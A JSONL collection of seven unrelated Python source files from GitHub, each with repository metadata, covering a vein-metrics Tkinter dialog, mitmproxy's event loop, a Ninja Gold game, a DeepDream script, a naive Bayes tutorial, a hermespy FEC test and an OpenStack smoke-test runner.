+{"seq_id":"17543035589","text":"import tkinter as tk\n\nfrom src.VeinSegmentation.Skeletonization import skeletonLenght\n\n\nclass VeinMetricsModal:\n def __init__(self, parent):\n self.parent = parent.children['!app']\n self.top = tk.Toplevel(parent)\n self.top.transient(parent)\n title = \"Métricas\"\n self.top.title(title)\n\n x = self.parent.winfo_x()\n y = self.parent.winfo_y()\n self.top.geometry(\"+%d+%d\" % (x + 300, y + 200))\n\n area = self.parent.processing.getMaskArea()\n isSkeletonized = self.parent.isSkeletonized\n pixelSize = self.parent.pixelSize\n print('Area in pixels is {} px'.format(area))\n if pixelSize:\n squarePixelSize = (1 / pixelSize) ** 2\n tk.Label(self.top, text=\"Area de la selección: {} cm2\".format(area / squarePixelSize)).pack()\n if isSkeletonized and pixelSize:\n measure = skeletonLenght(self.parent.processing.getCleanedSkeleton(), pixelSize)\n tk.Label(self.top, text=\"Longitud de la red venosa: {} cm\".format(measure)).pack()\n if not pixelSize and not isSkeletonized:\n tk.Label(self.top, text=\"Debes seleccionar una referencia para poder obtener información\").pack()\n\n def cancel(self):\n self.parent.focus_set()\n self.top.destroy()\n","repo_name":"nestorojeda/VeinSegmentation","sub_path":"src/Components/Modals/VeinMetricsModal.py","file_name":"VeinMetricsModal.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"59945487","text":"import sys\nimport traceback\nimport threading\nimport asyncio\nimport logging\n\nfrom mitmproxy import addonmanager\nfrom mitmproxy import options\nfrom mitmproxy import controller\nfrom mitmproxy import eventsequence\nfrom mitmproxy import command\nfrom mitmproxy import http\nfrom mitmproxy import websocket\nfrom mitmproxy import log\nfrom mitmproxy.net import server_spec\nfrom mitmproxy.coretypes import basethread\n\nfrom . import ctx as mitmproxy_ctx\n\n\n# Conclusively preventing cross-thread races on proxy shutdown turns out to be\n# very hard. We could build a thread sync infrastructure for this, or we could\n# wait until we ditch threads and move all the protocols into the async loop.\n# Until then, silence non-critical errors.\nlogging.getLogger('asyncio').setLevel(logging.CRITICAL)\n\n\nclass ServerThread(basethread.BaseThread):\n def __init__(self, server):\n self.server = server\n address = getattr(self.server, \"address\", None)\n super().__init__(\n \"ServerThread ({})\".format(repr(address))\n )\n\n def run(self):\n self.server.serve_forever()\n\n\nclass Master:\n \"\"\"\n The master handles mitmproxy's main event loop.\n \"\"\"\n def __init__(self, opts):\n self.should_exit = threading.Event()\n self.channel = controller.Channel(\n self,\n asyncio.get_event_loop(),\n self.should_exit,\n )\n\n self.options: options.Options = opts or options.Options()\n self.commands = command.CommandManager(self)\n self.addons = addonmanager.AddonManager(self)\n self._server = None\n self.waiting_flows = []\n self.log = log.Log(self)\n\n mitmproxy_ctx.master = self\n mitmproxy_ctx.log = self.log\n mitmproxy_ctx.options = self.options\n\n @property\n def server(self):\n return self._server\n\n @server.setter\n def server(self, server):\n server.set_channel(self.channel)\n self._server = server\n\n def start(self):\n self.should_exit.clear()\n if self.server:\n ServerThread(self.server).start()\n\n async def running(self):\n self.addons.trigger(\"running\")\n\n def run_loop(self, loop):\n self.start()\n asyncio.ensure_future(self.running())\n\n exc = None\n try:\n loop()\n except Exception as e: # pragma: no cover\n exc = traceback.format_exc()\n finally:\n if not self.should_exit.is_set(): # pragma: no cover\n self.shutdown()\n loop = asyncio.get_event_loop()\n for p in asyncio.Task.all_tasks():\n p.cancel()\n loop.close()\n\n if exc: # pragma: no cover\n print(exc, file=sys.stderr)\n print(\"mitmproxy has crashed!\", file=sys.stderr)\n print(\"Please lodge a bug report at:\", file=sys.stderr)\n print(\"\\thttps://github.com/mitmproxy/mitmproxy\", file=sys.stderr)\n\n self.addons.trigger(\"done\")\n\n def run(self, func=None):\n loop = asyncio.get_event_loop()\n self.run_loop(loop.run_forever)\n\n async def _shutdown(self):\n self.should_exit.set()\n if self.server:\n self.server.shutdown()\n loop = asyncio.get_event_loop()\n loop.stop()\n\n def shutdown(self):\n \"\"\"\n Shut down the proxy. 
This method is thread-safe.\n \"\"\"\n if not self.should_exit.is_set():\n self.should_exit.set()\n ret = asyncio.run_coroutine_threadsafe(self._shutdown(), loop=self.channel.loop)\n # Weird band-aid to make sure that self._shutdown() is actually executed,\n # which otherwise hangs the process as the proxy server is threaded.\n # This all needs to be simplified when the proxy server runs on asyncio as well.\n if not self.channel.loop.is_running(): # pragma: no cover\n try:\n self.channel.loop.run_until_complete(asyncio.wrap_future(ret))\n except RuntimeError:\n pass # Event loop stopped before Future completed.\n\n def _change_reverse_host(self, f):\n \"\"\"\n When we load flows in reverse proxy mode, we adjust the target host to\n the reverse proxy destination for all flows we load. This makes it very\n easy to replay saved flows against a different host.\n \"\"\"\n if self.options.mode.startswith(\"reverse:\"):\n _, upstream_spec = server_spec.parse_with_mode(self.options.mode)\n f.request.host, f.request.port = upstream_spec.address\n f.request.scheme = upstream_spec.scheme\n\n async def load_flow(self, f):\n \"\"\"\n Loads a flow and links websocket & handshake flows\n \"\"\"\n\n if isinstance(f, http.HTTPFlow):\n self._change_reverse_host(f)\n if 'websocket' in f.metadata:\n self.waiting_flows.append(f)\n\n if isinstance(f, websocket.WebSocketFlow):\n hf = [hf for hf in self.waiting_flows if hf.id == f.metadata['websocket_handshake']][0]\n f.handshake_flow = hf\n self.waiting_flows.remove(hf)\n self._change_reverse_host(f.handshake_flow)\n\n f.reply = controller.DummyReply()\n for e, o in eventsequence.iterate(f):\n await self.addons.handle_lifecycle(e, o)\n","repo_name":"panoslin/DouYinSpider","sub_path":"venv/Lib/site-packages/mitmproxy/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":5342,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"61"}
+{"seq_id":"18330799528","text":"from enum import Enum\n\n\nclass Location:\n def __init__(self, name, minimum, maximum, gamble):\n self.name = name\n self.min = minimum\n self.max = maximum\n self.gamble = gamble\n\nlocations = {\n 'farm': Location('farm', 10, 20, False),\n 'cave': Location('cave', 5, 10, False),\n 'house': Location('house', 2, 5, False),\n 'casino': Location('casino', 0, 50, True)\n }\n\n# Django cannot access class values directly. This list of dictionaries\n# is for the Django view version of locations to use to display info.\nlocations_dict = [\n locations['farm'].__dict__,\n locations['cave'].__dict__,\n locations['house'].__dict__,\n locations['casino'].__dict__\n ]\n\nclass GambleResult(Enum):\n WIN = 'earned'\n LOSE = 'lost'\n\n\nclass Activity:\n def __init__(self, gamble_result, amount, location, dt):\n self.gamble_result = gamble_result\n self.amount = amount\n self.location = location.__dict__\n self.time = dt\n\n def __str__(self):\n print(f'Location: {self.location}')\n if self.location['gamble']:\n new_action = f'Entered a {self.location[\"name\"]} and '\n new_action += 'won ' if self.gamble_result == GambleResult.WIN.value else 'lost '\n new_action += f'{self.amount} gold! '\n new_action += 'Ouch!!! ' if self.gamble_result == GambleResult.LOSE.value else ''\n else:\n new_action = f'Earned {self.amount} gold from the {self.location[\"name\"]}! '\n new_action += f'({self.time})'\n return new_action\n","repo_name":"JasonHarrer/DojoORM_NinjaGold","sub_path":"mainsite/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7314305335","text":"###############################################################################\n# Deep Dreamer\n# Based on https://github.com/google/deepdream/blob/master/dream.ipynb\n# Author: Kesara Rathnayake ( kesara [at] kesara [dot] lk )\n###############################################################################\n\nfrom os import mkdir, listdir\nfrom subprocess import PIPE, Popen\n\nimport numpy as np\nfrom caffe import Classifier, set_device, set_mode_gpu\nfrom deepdreamer.images2gif import writeGif\nfrom scipy.ndimage import affine_transform, zoom\nfrom PIL.Image import fromarray as img_fromarray, open as img_open\nimport logging\n\nlogging.basicConfig(\n filename='log.txt',\n format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.NOTSET)\n\n\ndef _select_network(netname):\n if netname == 'bvlc_googlenet':\n NET_FN = \"deploy.prototxt\" # Make sure force_backward: true\n PARAM_FN = \"bvlc_googlenet.caffemodel\"\n CHANNEL_SWAP = (2, 1, 0)\n # ImageNet mean, training set dependent\n CAFFE_MEAN = np.float32([104.0, 116.0, 122.0])\n return NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN\n elif netname == 'googlenet_place205':\n # TODO: refit SWAP and MEAN for places205? These work for now.\n NET_FN = \"deploy_places205.protxt\" # Make sure force_backward: true\n PARAM_FN = \"googlelet_places205_train_iter_2400000.caffemodel\"\n CHANNEL_SWAP = (2, 1, 0)\n # ImageNet mean, training set dependent\n CAFFE_MEAN = np.float32([104.0, 116.0, 122.0])\n return NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN\n else:\n print(\"Error: network {} not implemented\".format(netname))\n\n\ndef _preprocess(net, img):\n return np.float32(np.rollaxis(img, 2)[::-1]) - net.transformer.mean[\"data\"]\n\n\ndef _deprocess(net, img):\n return np.dstack((img + net.transformer.mean[\"data\"])[::-1])\n\n\ndef _make_step(\n net, step_size=1.5, end=\"inception_4c/output\", jitter=32, clip=True):\n \"\"\" Basic gradient ascent step. 
\"\"\"\n\n src = net.blobs[\"data\"]\n dst = net.blobs[end]\n\n ox, oy = np.random.randint(-jitter, jitter+1, 2)\n\n # apply jitter shift\n src.data[0] = np.roll(np.roll(src.data[0], ox, -1), oy, -2)\n\n net.forward(end=end)\n dst.diff[:] = dst.data # specify the optimization objective\n net.backward(start=end)\n g = src.diff[0]\n # apply normalized ascent step to the input image\n src.data[:] += step_size/np.abs(g).mean() * g\n # unshift image\n src.data[0] = np.roll(np.roll(src.data[0], -ox, -1), -oy, -2)\n\n if clip:\n bias = net.transformer.mean[\"data\"]\n src.data[:] = np.clip(src.data, -bias, 255-bias)\n\n\ndef _deepdream(\n net, base_img, iter_n=10, octave_n=4, octave_scale=1.4,\n end=\"inception_4c/output\", clip=True, **step_params):\n # prepare base images for all octaves\n octaves = [_preprocess(net, base_img)]\n\n for i in range(octave_n-1):\n octaves.append(zoom(\n octaves[-1], (1, 1.0/octave_scale, 1.0/octave_scale), order=1))\n\n src = net.blobs[\"data\"]\n\n # allocate image for network-produced details\n detail = np.zeros_like(octaves[-1])\n\n for octave, octave_base in enumerate(octaves[::-1]):\n h, w = octave_base.shape[-2:]\n if octave > 0:\n # upscale details from the previous octave\n h1, w1 = detail.shape[-2:]\n detail = zoom(detail, (1, 1.0*h/h1, 1.0*w/w1), order=1)\n\n src.reshape(1, 3, h, w) # resize the network's input image size\n src.data[0] = octave_base+detail\n\n for i in range(iter_n):\n _make_step(net, end=end, clip=clip, **step_params)\n\n # visualization\n vis = _deprocess(net, src.data[0])\n if not clip: # adjust image contrast if clipping is disabled\n vis = vis*(255.0/np.percentile(vis, 99.98))\n\n # extract details produced on the current octave\n detail = src.data[0]-octave_base\n\n # returning the resulting image\n return _deprocess(net, src.data[0])\n\n\ndef _output_video_dir(video):\n return \"{}_images\".format(video)\n\n\ndef _extract_video(video):\n output_dir = _output_video_dir(video)\n mkdir(output_dir)\n output = Popen(\n \"ffmpeg -loglevel quiet -i {} -f image2 {}/img_%4d.jpg\".format(\n video, output_dir), shell=True, stdout=PIPE).stdout.read()\n\n\ndef _create_video(video, frame_rate=24):\n output_dir = _output_video_dir(video)\n output = Popen((\n \"ffmpeg -loglevel quiet -r {} -f image2 -pattern_type glob \"\n \"-i \\\"{}/img_*.jpg\\\" {}.mp4\").format(\n frame_rate, output_dir, video),\n shell=True, stdout=PIPE).stdout.read()\n\n\ndef list_layers(network=\"bvlc_googlenet\"):\n # Load DNN model\n NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN = _select_network(network)\n net = Classifier(\n NET_FN, PARAM_FN, mean=CAFFE_MEAN, channel_swap=CHANNEL_SWAP)\n net.blobs.keys()\n\n\ndef deepdream(\n img_path, zoom=True, scale_coefficient=0.05, irange=100, iter_n=10,\n octave_n=4, octave_scale=1.4, end=\"inception_4c/output\", clip=True,\n network=\"bvlc_googlenet\", gif=False, reverse=False, duration=0.1,\n loop=False, gpu=False, gpuid=0):\n img = np.float32(img_open(img_path))\n s = scale_coefficient\n h, w = img.shape[:2]\n\n if gpu:\n print(\"Enabling GPU {}...\".format(gpuid))\n set_device(gpuid)\n set_mode_gpu()\n\n # Select, load DNN model\n NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN = _select_network(network)\n net = Classifier(\n NET_FN, PARAM_FN, mean=CAFFE_MEAN, channel_swap=CHANNEL_SWAP)\n\n img_pool = [img_path]\n\n # Save settings used in a log file\n logging.info((\n \"{} zoom={}, scale_coefficient={}, irange={}, iter_n={}, \"\n \"octave_n={}, octave_scale={}, end={}, clip={}, network={}, gif={}, \"\n \"reverse={}, duration={}, 
loop={}\").format(\n img_path, zoom, scale_coefficient, irange, iter_n, octave_n,\n octave_scale, end, clip, network, gif, reverse, duration, loop))\n\n print(\"Dreaming...\")\n for i in range(irange):\n img = _deepdream(\n net, img, iter_n=iter_n, octave_n=octave_n,\n octave_scale=octave_scale, end=end, clip=clip)\n img_fromarray(np.uint8(img)).save(\"{}_{}.jpg\".format(\n img_path, i))\n if gif:\n img_pool.append(\"{}_{}.jpg\".format(img_path, i))\n print(\"Dream {} saved.\".format(i))\n if zoom:\n img = affine_transform(\n img, [1-s, 1-s, 1], [h*s/2, w*s/2, 0], order=1)\n if gif:\n print(\"Creating gif...\")\n frames = None\n if reverse:\n frames = [img_open(f) for f in img_pool[::-1]]\n else:\n frames = [img_open(f) for f in img_pool]\n writeGif(\n \"{}.gif\".format(img_path), frames, duration=duration,\n repeat=loop)\n print(\"gif created.\")\n\n\ndef deepdream_video(\n video, iter_n=10, octave_n=4, octave_scale=1.4,\n end=\"inception_4c/output\", clip=True, network=\"bvlc_googlenet\",\n frame_rate=24):\n\n # Select, load DNN model\n NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN = _select_network(network)\n net = Classifier(\n NET_FN, PARAM_FN, mean=CAFFE_MEAN, channel_swap=CHANNEL_SWAP)\n\n print(\"Extracting video...\")\n _extract_video(video)\n\n output_dir = _output_video_dir(video)\n images = listdir(output_dir)\n\n print(\"Dreaming...\")\n for image in images:\n image = \"{}/{}\".format(output_dir, image)\n img = np.float32(img_open(image))\n img = _deepdream(\n net, img, iter_n=iter_n, octave_n=octave_n,\n octave_scale=octave_scale, end=end, clip=clip)\n img_fromarray(np.uint8(img)).save(image)\n\n print(\"Creating dream video...\")\n _create_video(video, frame_rate)\n print(\"Dream video created.\")\n","repo_name":"kesara/deepdreamer","sub_path":"deepdreamer/deepdreamer.py","file_name":"deepdreamer.py","file_ext":"py","file_size_in_byte":7851,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"61"}
+{"seq_id":"6500889686","text":"# 贝氏分类器\n# 是一种非常快速且简单的分类算法, 经常适用于非常高维度的资料\n# 因为此算法非常快而且可调的参数非常少, 常被拿来当作针对某一分类问题应急用的基线时非常实用\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\nclass BayesianClassification():\n def introduce(self):\n '''Naive Bayes分类器建立在 Bayesian分类法之上.\\n\\\n 它所依赖的Bayes定理, 是用来描述统计量条件几率关系的等式. \\n\\\n 若已经给了一些观察过的特征标签之几率写成 P(L|features), 贝氏定理可以使用可计算的量来表达. \\n\\\n \\tP(L|features) = P(feature|L) * P(L) / P(features)\\n\\\n # supplement: P(L|features) = P(L∩features)/P(features) ∩表示交集.\\n\\\n 若我们尝试在2个标签之间做决定, 假设2个标签分别为L1, L2, \\n\\\n \\tP(L1|features) / P(L2|features) = P(features|L1) * P(L1) / P(features|L2) * P(L2)\\n\\\n 现在我们需要的就是可以对每一个标签计算 P(features|L1)的模型, 此模型称为生成模型(generative model),\\n\\\n 因为它指定了产生这些资料的假定随机程序;对于每个标签指定一个生成模型是贝氏分类器的主要部分.\\n\\\n 贝氏分类器的不同型态依赖在关于资料不同的单纯假设, 以下会有一些例子.\\n\n '''\n \n def GaussianNaiveBayes(self):\n '''此分类器是假设每一个标签的资料都是来自于一个简单的高斯分布(simple Gaussian distribution)'''\n # 假如有以下的资料\n from sklearn.datasets import make_blobs\n x, y = make_blobs(100, 2, centers = 2, random_state = 2, cluster_std = 1.5)\n plt.scatter(x[:, 0], x[:, 1], c = y, s = 50, cmap = 'RdBu')\n # plt.show()\n\n # 建立一个简单的模型, 并预测其标签\n explanation = \"在此分类中可以稍微看到一个弯曲的边界. 一般而言, 高斯朴素贝氏的边界都是二次方程式\"\n from sklearn.naive_bayes import GaussianNB\n model = GaussianNB()\n model.fit(x, y)\n rng = np.random.RandomState(0)\n xnew = [-6, -14] + [14, 18] * rng.rand(2000, 2)\n ynew = model.predict(xnew)\n # plt.scatter(x[:, 0], x[:, 1], c = y, s = 50, cmap = 'RdBu')\n lim = plt.axis()\n plt.scatter(xnew[:, 0], xnew[:, 1], c = ynew, s = 20, cmap = 'BrBG', alpha = 0.1)\n plt.axis(lim)\n # print(explanation)\n # plt.show()\n\n # 贝氏定理其中一个不错的点是, 在本质上允许几率分类, 使得可以利用predict_proda方法来进行计算\n yprod = model.predict_proba(xnew)\n print(yprod[-8:].round(2))\n # [[0.89 0.11]\n # [1. 0. ]\n # [1. 0. ]\n # [1. 0. ]\n # [1. 0. ]\n # [1. 0. ]\n # [0. 1. ]\n # [0.15 0.85]]\n\n # 上面这些栏的内容列出了第一个和第二个的后验几率. 
如果在寻找分类中对于不确定性的评估, \n # 像这样的贝氏方式是很有用的方法.\n # 但是, 最终分类将只会和模型假设所推导的一样好, 这也是为什么高斯朴素贝氏经常没有办法产生非常好的结果\n # 然而, 在许多的情况中, 这个假设不至于让高斯朴素贝氏不能成为一个好用的方法\n\n def MultinomialNaiveBayes(self, s = None):\n '''多项式朴素贝氏, 它的特征被假设是从一个简单的多项式分布产生而来的\\n\\\n 多项式分布描述在一个数量的类别中观察到的次数之频率, 而使得此种多项式朴素贝式非常适合于其特征是\\n\\\n 代表次数或计次比率的地方.\\n\\\n 这个概念和上一个一样, 原本资料分布是使用最适高斯, 而改为使用最适多项式分布来取代资料分布.'''\n\n # Example: 文字的分类\n # 多项式朴素贝氏经常会被用到的地方是文字的分类工作, 其中特征是和要被分类的文件中文字出现的次数或频率相关的\n # 在此将从20个新闻群组语料库中使用稀疏文字计数特征, 以展示可以如何把这些简短的文件分类\n\n from sklearn.datasets import fetch_20newsgroups\n data = fetch_20newsgroups()\n # print(data.target_names)\n \n # 为了简单起见, 选用少部分的类别, 接着下载训练和测试资料集\n categories = ['talk.religion.misc', 'soc.religion.christian', 'sci.space', 'comp.graphics']\n train = fetch_20newsgroups(subset = 'train', categories = categories)\n test = fetch_20newsgroups(subset = 'test', categories = categories)\n \n # 以下是从资料中所得到的其中一个项目的代表性内容\n # print(train.data[5])\n\n # 为了使用这些资料进行机器学习, 首先要把每个字串的内容转换成数值向量, 使用TF-IDF\n from sklearn.feature_extraction.text import TfidfVectorizer\n from sklearn.naive_bayes import MultinomialNB\n from sklearn.pipeline import make_pipeline\n\n model = make_pipeline(TfidfVectorizer(), MultinomialNB())\n model.fit(train.data, train.target)\n labels = model.predict(test.data)\n\n # 使用测试资料完成预测标签后, 使用混淆矩阵来验证, 显示真实结果与预测之间以了解评估器的效能\n from sklearn.metrics import confusion_matrix\n mat = confusion_matrix(test.target, labels)\n sns.heatmap(mat.T, square = True, annot = True, fmt = 'd', cbar = False, \n xticklabels = train.target_names, yticklabels = train.target_names)\n plt.xlabel('true label')\n plt.ylabel('predicted label')\n # plt.show()\n\n # 现在有一个工具可以判断任意字串的类别, 使用在这个管线中的predict()方法\n if s != \"None\":\n pred = model.predict([s])\n return train.target_names[pred[0]]\n\n\n def summary(self):\n '''贝氏分类器优点: 不管训练or预测都非常快速; 提供了直接的几率预测; 易于解读; 可调变参数少\\n\\\n 但是一般而言它在更复杂的模型上并不一定执行一样好.\\n\\\n 通常在以下情况时会表现得特别好: 当朴素(naive)的假设正好符合资料时; 区分非常好的类别来说\\n\\\n , 模型的复杂度显得不是这么重要; 对于非常高维度的资料, 模型复杂度也比较不重要.'''\n\nNBC = BayesianClassification()\nhelp(NBC.introduce)\n# NBC.GaussianNaiveBayes() # 用 help 可以查看函数的解说\n# NBC.MultinomialNaiveBayes() # 用 help 可以查看函数的解说\n\ns = 'sending a payload to the ISS'\n# print(NBC.MultinomialNaiveBayes(s)) # sci.space\n# help(NBC.MultinomialNaiveBayes)\n# help(NBC.summary)","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/MachineLearning/Data Science/ML_NaiveBayes_Classification.py","file_name":"ML_NaiveBayes_Classification.py","file_ext":"py","file_size_in_byte":6943,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5580689107","text":"# -*- coding: utf-8 -*-\nfrom os import path\nfrom unittest import TestCase\nfrom unittest.mock import patch, Mock\nfrom tempfile import TemporaryDirectory\n\nimport ray\nimport numpy as np\n\nfrom hermespy.simulation import Simulation\nfrom hermespy.fec import LDPCCoding\nfrom hermespy.modem import DuplexModem, RootRaisedCosineWaveform\nfrom hermespy.tools import db2lin\n\n__author__ = \"Jan Adler\"\n__copyright__ = \"Copyright 2023, Barkhausen Institut gGmbH\"\n__credits__ = [\"Jan Adler\"]\n__license__ = \"AGPLv3\"\n__version__ = \"1.1.0\"\n__maintainer__ = \"Jan Adler\"\n__email__ = \"jan.adler@barkhauseninstitut.org\"\n__status__ = \"Prototype\"\n\n\nclass TestMonteCarloFEC(TestCase):\n \n def setUp(self) -> None:\n \n self.simulation = Simulation()\n self.simulation.new_dimension('snr', [db2lin(x) for x in np.arange(-10, 10, .5)])\n self.simulation.num_samples = 2\n device = self.simulation.scenario.new_device()\n self.modem = DuplexModem()\n self.modem.device = device\n self.modem.waveform_generator = RootRaisedCosineWaveform(oversampling_factor=1, symbol_rate=100e6, num_data_symbols=200, modulation_order=64, num_preamble_symbols=0)\n \n @classmethod\n def setUpClass(cls) -> None:\n\n ray.init(local_mode=True, num_cpus=2, ignore_reinit_error=True)\n \n @classmethod\n def tearDownClass(cls) -> None:\n\n # Shut down ray \n ray.shutdown()\n \n def __run_simulation(self) -> None:\n \"\"\"Run a simulation and test for proper execution.\"\"\"\n\n with patch('sys.stdout'), patch('matplotlib.pyplot.figure'):\n \n self.simulation.run()\n \n def _test_ldpc(self) -> None:\n \n ldpc_matrix = path.join(path.dirname(path.realpath(__file__)), '..', '..', 'submodules', 'affect', 'conf', 'dec', 'LDPC', 'CCSDS_64_128.alist')\n \n with TemporaryDirectory() as g_dir:\n \n g_path = path.join(g_dir, 'g_save.alist')\n coding = LDPCCoding(100, ldpc_matrix, \"\", False, 10)\n self.modem.encoder_manager.add_encoder(coding)\n \n self.__run_simulation()\n","repo_name":"Barkhausen-Institut/hermespy","sub_path":"tests/integration_tests/test_fec_ray.py","file_name":"test_fec_ray.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"}
+{"seq_id":"19760260077","text":"from contextlib import contextmanager\nimport copy\nimport os\n\nfrom yakumo import Client\nfrom yakumo.smoketest import *\nfrom yakumo import utils\n\nfrom yakumo.smoketests import *\n\n\nCIDR1 = os.environ.get('CIDR1', '192.168.35.0/24')\nCIDR2 = os.environ.get('CIDR2', '192.168.36.0/24')\nGATEWAY_IP1 = os.environ.get('GATEWAY_IP1', '192.168.35.254')\nGATEWAY_IP2 = os.environ.get('GATEWAY_IP2', '192.168.36.254')\n\nIMAGE = os.environ.get('IMAGE', 'images/cirros-0.3.5-x86_64-disk.img')\nCONTAINER_FORMAT = os.environ.get('CONTAINER_FORMAT', 'bare')\nDISK_FORMAT = os.environ.get('DISK_FORMAT', 'qcow2')\nFLAVOR = os.environ.get('FLAVOR', 'm1.tiny')\nAZ = os.environ.get('AZ', 'nova')\nROLE = os.environ.get('ROLE', '_member_')\n\n\ndef run_tenant_tests(c, c2):\n\n for t in SWIFT_TESTS + GLANCE_TESTS + NEUTRON_TESTS + CINDER_TESTS:\n try:\n LOG.info(\"%s: Started\", t.__doc__)\n if t.__name__.endswith('admin'):\n t.main(c)\n else:\n t.main(c2)\n LOG.info(\"%s: Finished successfully\", t.__doc__)\n except Exception as e:\n LOG.exception(\"%s: Error occured: %s\", t.__doc__, e)\n\n with c2.network.create(name=get_random_str('network'),\n is_shared=False) as n1, \\\n c2.network.create(name=get_random_str('network'),\n is_shared=False) as n2:\n\n with c2.subnet.create(name=get_random_str('subnet'),\n network=n1,\n ip_version=4,\n cidr=CIDR1,\n gateway_ip=GATEWAY_IP1,\n is_dhcp_enabled=True) as sn1, \\\n c2.subnet.create(name=get_random_str('subnet'),\n network=n2,\n ip_version=4,\n cidr=CIDR2,\n gateway_ip=GATEWAY_IP2,\n is_dhcp_enabled=True) as sn2:\n\n with c2.router.create(name=get_random_str('router')) as r1, \\\n c2.router.create(name=get_random_str('router')) as r2, \\\n c2.key_pair.create(name=get_random_str('keypair')) as k, \\\n c2.image.create(name=get_random_str('image'),\n file=IMAGE,\n container_format=CONTAINER_FORMAT,\n disk_format=DISK_FORMAT) as i:\n\n r1.add_interface(subnet=sn1)\n r2.add_interface(subnet=sn2)\n\n f = c2.flavor.find_one(name=FLAVOR)\n az = c2.availability_zone.get_empty(AZ)\n\n for t in NOVA_TESTS:\n try:\n LOG.info(\"%s: Started\", t.__doc__)\n if t.__name__.endswith('admin'):\n t.main(\n c, image=i, flavor=f, key_pair=k,\n network=n1, network2=n2,\n availability_zone=az)\n else:\n t.main(\n c2, image=i, flavor=f, key_pair=k,\n network=n1, network2=n2,\n availability_zone=az)\n LOG.info(\"%s: Finished successfully\", t.__doc__)\n except Exception as e:\n LOG.exception(\"%s: Error occured: %s\",\n t.__doc__, e)\n\n r1.remove_interface(subnet=sn1)\n r2.remove_interface(subnet=sn2)\n\n test(\"Router #1 is deleted\", r1 not in c2.router.list())\n test(\"Router #2 is deleted\", r2 not in c2.router.list())\n test(\"Key Pair #1 is deleted\", k not in c2.key_pair.list())\n test(\"Image #1 is deleted\", i not in c2.image.list())\n\n test(\"Subnet #1 is deleted\", sn1 not in c2.subnet.list())\n test(\"Subnet #2 is deleted\", sn2 not in c2.subnet.list())\n\n test(\"Network #1 is deleted\", n1 not in c2.network.list())\n test(\"Network #2 is deleted\", n2 not in c2.network.list())\n\n\ndef run_tests(c):\n\n for t in KEYSTONE_TESTS:\n try:\n LOG.info(\"%s: Started\", t.__doc__)\n t.main(c)\n LOG.info(\"%s: Finished successfully\", t.__doc__)\n except Exception as e:\n LOG.exception(\"%s: Error occured: %s\", t.__doc__, e)\n\n project_name = get_random_str('test')\n user_name = get_random_str('test')\n password = get_random_str('pass')\n\n config = copy.copy(c._session.config)\n config['auth']['project_name'] = project_name\n 
config['auth']['username'] = user_name\n config['auth']['password'] = password\n r = c.role.find_one(name=ROLE)\n\n if config['identity_api_version'] == '2.0':\n with c.project.create(name=project_name,\n description='test project',\n is_enabled=True) as p:\n with c.user.create(name=user_name,\n username='test user',\n password=password,\n project=p,\n is_enabled=True) as u:\n p.grant_roles(users=u, roles=r)\n c2 = Client(**config)\n run_tenant_tests(c, c2)\n\n test(\"User #1 is deleted\", u not in c.user.list())\n test(\"Project #1 is deleted\", p not in c.project.list())\n\n elif config['identity_api_version'] == '3':\n d = c.domain.find_one(name=config['auth']['project_domain_name'])\n with c.project.create(name=project_name,\n description='test project',\n domain=d,\n is_enabled=True) as p:\n with c.user.create(name=user_name,\n password=password,\n domain=d,\n is_enabled=True) as u:\n p.grant_roles(users=u, roles=r)\n c2 = Client(**config)\n run_tenant_tests(c, c2)\n\n test(\"User #1 is deleted\", u not in c.user.list())\n test(\"Project #1 is deleted\", p not in c.project.list())\n\n\ndef main():\n c = utils.get_client()\n\n LOG.debug(\"list networks: %s\", [_.name for _ in c.network.list()])\n LOG.debug(\"list subnets: %s\", [_.name for _ in c.subnet.list()])\n LOG.debug(\"list routers: %s\", [_.name for _ in c.router.list()])\n LOG.debug(\"list servers: %s\", [_.name for _ in c.server.list()])\n LOG.debug(\"list key pairs: %s\", [_.name for _ in c.key_pair.list()])\n LOG.debug(\"list images: %s\", [_.name for _ in c.image.list()])\n run_tests(c)\n LOG.debug(\"list networks: %s\", [_.name for _ in c.network.list()])\n LOG.debug(\"list subnets: %s\", [_.name for _ in c.subnet.list()])\n LOG.debug(\"list routers: %s\", [_.name for _ in c.router.list()])\n LOG.debug(\"list servers: %s\", [_.name for _ in c.server.list()])\n LOG.debug(\"list key pairs: %s\", [_.name for _ in c.key_pair.list()])\n LOG.debug(\"list images: %s\", [_.name for _ in c.image.list()])\n show_test_summary()\n\nif __name__ == '__main__':\n main()\n","repo_name":"iliiilililii/python-yakumo","sub_path":"yakumo/cmd/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":7285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
